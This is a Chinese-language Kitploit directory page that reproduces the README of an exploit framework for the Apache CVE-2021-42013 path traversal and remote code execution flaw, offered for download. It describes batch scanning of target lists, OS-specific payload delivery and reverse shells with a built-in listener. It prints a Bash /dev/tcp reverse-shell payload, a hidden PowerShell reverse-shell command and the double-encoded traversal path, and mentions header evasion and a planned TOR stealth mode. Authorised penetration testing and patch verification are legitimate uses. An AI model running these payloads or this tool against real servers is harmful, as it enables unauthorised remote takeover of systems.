Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2021-42013-EXPLOIT — 一款先进的扫描、利用和远程交互工具,旨在检测和利用配置不当的服务器中的Apache路径遍历+远程代码执行漏洞(CVE-2021-42013)。 | Kitploit
工具/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
侦察漏洞扫描器Payload生成漏洞利用ShellcodeWeb应用程序漏洞利用信息收集渗透测试命令与控制

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
远程访问工具
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

一款先进的扫描、利用和远程交互工具,旨在检测和利用配置不当的服务器中的Apache路径遍历+远程代码执行漏洞(CVE-2021-42013)。

查看仓库
41年前尚未审核

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 漏洞利用框架 — Makaveli

> 💀 多维宇宙黑客模式已激活...

一款先进的扫描、利用和远程交互工具,旨在检测并利用错误配置服务器中的 **Apache 路径遍历 + RCE(CVE-2021-42013)** 漏洞。

---

## ⚠️ 法律警告

> 本软件仅用于受控环境下的教育和研究目的。

在未获得明确授权的情况下使用本工具攻击系统可能违法,并在许多国家构成犯罪。

作者不对任何滥用此代码的行为负责。请自行承担风险,并始终获得目标系统所有者的明确许可。

---

 🧠 技术描述

本工具可:

- ✅ 从 `.txt` 文件扫描多个目标。
- ✅ 自动检测 CVE-2021-42013 漏洞存在。
- ✅ 识别远程操作系统(Linux 或 Windows)。
- ✅ 根据检测到的系统发送定制化 Payload。
- ✅ 建立反向 Shell 并获取远程访问权限。
- ✅ 通过内置监听器实时交互。
- ✅ 提供高级日志、进度条和交互菜单。

---

## 🔧 环境要求

- Python **3.8+**
- 基于 Unix/Linux/MacOS 的系统(使用 `subprocess` 和 `curl`)
- 需要以下 Python 库:

```bash
pip install -r requirements.txt

requirements.txt

root@kitploit:~
rich
alive-progress

同时需要在操作系统中安装 curl。


📁 文件结构

root@kitploit:~
.
├── POC-CVE.py       # 主脚本
├── logs.txt              # 自动生成的日志文件
├── requirements.txt      # Python 依赖
└── targets.txt           # (可选)待扫描的 URL 列表

🚀 交互式使用

root@kitploit:~
python3 POC-CVE.py

选择以下选项:

  • scan_file:从文件扫描多个 URL,显示哪些存在漏洞。
  • exploit:直接攻击单个目标,建立反向 Shell。
  • exit:退出交互模式。

🔍 批量扫描(scan_file)

  1. 创建一个包含 URL 列表的文件,每行一个:
root@kitploit:~
http://example.com
http://victim.net
http://192.168.1.100
  1. 启动扫描:
root@kitploit:~
python3 POC-CVE.py

选择 scan_file 并输入:

  • 文件路径
  • 并行扫描的线程数

💥 漏洞利用(exploit)

  1. 在菜单中选择 exploit。
  2. 输入:
  • 目标 URL
  • 用于接收 Shell 的本地 IP(LHOST)
  • 监听端口(LPORT)

脚本会:

  • 检测目标是否存在漏洞。
  • 根据远程操作系统发送适当的 Payload。
  • 打开 监听器 并提供交互式访问。

🧪 Payload 示例

Linux Payload(Bash TCP 反向 Shell)

root@kitploit:~
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'

Windows Payload(PowerShell TCP 反向 Shell)

root@kitploit:~
powershell -NoP -NonI -W Hidden -Command ...

🧠 使用的技术

  • 双重编码路径遍历(/.%252e/.%252e/.%252e)
  • 通过 curl 进行命令注入
  • 规避头部(User-Agent、Accept 等)
  • 反向 Shell 实现远程控制
  • 多线程与进度条(Alive Progress)
  • 带时间戳的日志记录与 Rich Console

📌 CVE 参考

  • CVE-ID:CVE-2021-42013
  • 攻击向量:GET /cgi-bin/.%%32%65/.%%32%65/...
  • 影响:RCE(远程代码执行)
  • CVSS 评分:9.8(严重)

🧙‍♂️ 作者

  • ✨ Makaveli — “入侵你自己的现实”

🛡️ 免责声明

本项目“按原样”提供,不附带任何担保,也不对因使用造成的损害承担责任。 切勿在未获得所有者明确同意的情况下扫描或攻击任何系统。


✅ 最佳实践

  • 仅在 实验室环境 或授权测试中使用此脚本。
  • 确保监听端口 开放 且 未被防火墙阻止。
  • 除非绝对必要,否则以普通用户(而非 root)身份运行。

🧩 未来路线图(可选)

  • 支持自定义 Payload
  • 导出结果为 CSV/JSON
  • 隐身模式:头部轮换和 TOR 代理
  • 本地 Web 界面(Flask)
root@kitploit:~

---


@DonMakaveliw,准备好创造未来了吗?

下载工具